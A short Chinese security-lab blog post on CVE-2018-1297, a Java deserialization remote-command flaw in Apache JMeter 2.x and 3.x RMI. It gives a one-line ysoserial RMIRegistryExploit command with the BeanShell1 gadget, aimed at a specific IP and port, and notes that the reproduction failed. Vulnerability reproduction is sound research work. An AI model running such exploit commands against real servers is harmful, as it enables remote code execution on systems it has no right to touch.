【初级】Jmeter RMI 反序列化命令执行漏洞

CVE-2018-1297

漏洞描述:Apache JMeter是美国阿帕奇(Apache)软件基金会的一套使用Java语言编写的用于压力测试和性能测试的开源软件。其2.x版本和3.x版本中存在反序列化漏洞,攻击者可以利用该漏洞在目标服务器上执行任意命令。

影响版本:其2.x版本和3.x版本中存在反序列化漏洞

参考资料:

漏洞复现

java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit 123.58.224.8 12605 BeanShell1 'touch /tmp/CVE-2018-1297_is_success'
图片[1]-【初级】Jmeter RMI 反序列化命令执行漏洞-NGC660 安全实验室
复现失败
© 版权声明
THE END
喜欢就支持一下吧
点赞12赏点小钱 分享